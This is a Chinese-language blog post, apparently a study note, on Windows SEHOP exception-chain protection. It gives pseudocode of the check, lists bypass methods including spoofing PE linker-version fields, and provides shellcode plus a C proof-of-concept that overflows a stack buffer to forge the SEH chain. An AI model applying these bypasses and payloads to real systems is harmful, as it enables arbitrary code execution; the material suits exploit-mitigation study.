SEHOP的介紹和一點簡單攻擊

本文來源：Moeomu的部落格

簡介

SEHOP的核心任務就是檢查S.E.H鏈的完整性，在程式轉入異常處理前SEHOP會檢查S.E.H鏈上最後一個異常處理函式是否為系統固定的終極異常處理函式。如果是，則說明這條S.E.H鏈沒有被破壞，程式可以去執行當前的異常處理函式；如果檢測到最後一個異常處理函式不是，則說明S.E.H鏈被破壞，可能發生了S.E.H覆蓋攻擊，程式將不會去執行當前的異常處理函式

SEHOP驗證虛擬碼

if (process_flags & 0x40 == 0)  // 如果沒有SEH記錄則不進行檢測
{
    if (record != 0xFFFFFFFF)  // 開始檢測
    {
        do
        {
            if (record < stack_bottom || record > stack_top) // SEH 記錄必須位於棧中
                goto corruption;
            if ((char *)record + sizeof(EXCEPTION_REGISTRATION) > stack_top) // SEH 記錄結構需完全在棧中
                goto corruption;
            if ((record & 3) != 0) // SEH記錄必須4位元組對齊
                goto corruption;
            handler = record->handler;
            if (handler >= stack_bottom && handler < stack_top) // 異常處理函式地址不能位於棧中
                goto corruption;
            record = record->next;
        } while (record != 0xFFFFFFFF); // 遍歷S.E.H鏈
    }
    if ((TEB->word_at_offset_0xFCA & 0x200) != 0)
    {
        if (handler != &FinalExceptionHandler) // 核心檢測，地球人都知道，不解釋了
        goto corruption;
    }
}
 

攻擊思路

攻擊返回地址

如果此函式啟用了SEHOP但是沒有啟用GS或者函式剛好沒有啟用GS那麼直接攻擊返回地址即可

攻擊虛擬函式

SEHOP只保護SEH，但是虛擬函式表它並沒有保護，攻擊虛擬函式依舊可以成功

利用未啟用SEHOP的模組

微軟為一些加密殼禁用了SEHOP，例如穿山甲Armadilo

• 作業系統會根據PE頭中MajorLinkerVersion和MinorLinkerVersion兩個選項來判斷是否為程式禁用SEHOP。例如，我們可以將這兩個選項分別設定為0x53和0x52來模擬經過Armadilo加殼的程式，從而達到禁用SEHOP的目的
• Windows 7以及以後的系統中PEB_LDR_DATA
  指向的第二個模組被KernelBase.dll佔據，所以shellcode應該修改一下

Shellcode_for_windows7=
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09"
"\x8B\x09" // 在這增加機器碼\x8B\x09，它對應的彙編為mov ecx,[ecx]
"\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8"
;
 

偽造SEH連結串列

前提：ASLR不啟用

• 思路

  • 通過未啟用SafeSEH的SEH_NOSafeSEH_JUMP.dll來繞過SafeSEH
  • 通過偽造S.E.H鏈，造成S.E.H鏈未被破壞的假象來繞過SEHOP
  • SEH_NOSafeSEH中的test函式存在一個典型的溢位，即通過向str複製超長字串造成str溢位，進而覆蓋程式的S.E.H資訊
  • 使用SEH_NOSafeSEH_JUMP.DLL中的pop pop retn指令地址覆蓋異常處理函式地址，然後通過製造除0異常，將程式轉入異常處理
  • 通過劫持異常處理流程，程式轉入SEH_NOSaeSEH_JUMP.DLL中執行pop pop retn指令，在執行retn後程序轉入shellcode執行

• 程式碼

#include <string.h>
#include <windows.h>

char shellcode[] =
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90\x90"
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\x14\xFF\x12\x00" // address of last seh record
"\x12\x10\x12\x11" // address of pop pop retn in No_SafeSEH module
"\x90\x90\x90\x90\x90\x90\x90\x90"
"\xFC\x68\x6A\x0A\x38\x1E\x68\x63\x89\xD1\x4F\x68\x32\x74\x91\x0C"
"\x8B\xF4\x8D\x7E\xF4\x33\xDB\xB7\x04\x2B\xE3\x66\xBB\x33\x32\x53"
"\x68\x75\x73\x65\x72\x54\x33\xD2\x64\x8B\x5A\x30\x8B\x4B\x0C\x8B"
"\x49\x1C\x8B\x09"
"\x8B\x09" // 在這增加機器碼\x8B\x09，它對應的彙編為mov ecx,[ecx]
"\x8B\x69\x08\xAD\x3D\x6A\x0A\x38\x1E\x75\x05\x95"
"\xFF\x57\xF8\x95\x60\x8B\x45\x3C\x8B\x4C\x05\x78\x03\xCD\x8B\x59"
"\x20\x03\xDD\x33\xFF\x47\x8B\x34\xBB\x03\xF5\x99\x0F\xBE\x06\x3A"
"\xC4\x74\x08\xC1\xCA\x07\x03\xD0\x46\xEB\xF1\x3B\x54\x24\x1C\x75"
"\xE4\x8B\x59\x24\x03\xDD\x66\x8B\x3C\x7B\x8B\x59\x1C\x03\xDD\x03"
"\x2C\xBB\x95\x5F\xAB\x57\x61\x3D\x6A\x0A\x38\x1E\x75\xA9\x33\xDB"
"\x53\x68\x77\x65\x73\x74\x68\x66\x61\x69\x6C\x8B\xC4\x53\x50\x50"
"\x53\xFF\x57\xFC\x53\xFF\x57\xF8\x90\x90"
"\xFF\xFF\xFF\xFF" // the fake seh record
"\x75\xA8\xF7\x77"
;

DWORD MyException(void)
{
    printf("There is an exception");
    getchar();
    return 1;
}

void test(char * input)
{
    char str[200];
    memcpy(str, input, 412);
    int zero = 0;
    __try
    {
        zero = 1 / zero;
    }
    __except(MyException()){}
}

int main()
{
    HINSTANCE hInst = LoadLibrary(_T("SEH_NOSaeSEH_JUMP.dll")); // load No_SafeSEH module
    char str[200];
    test(shellcode);
    return 0;
}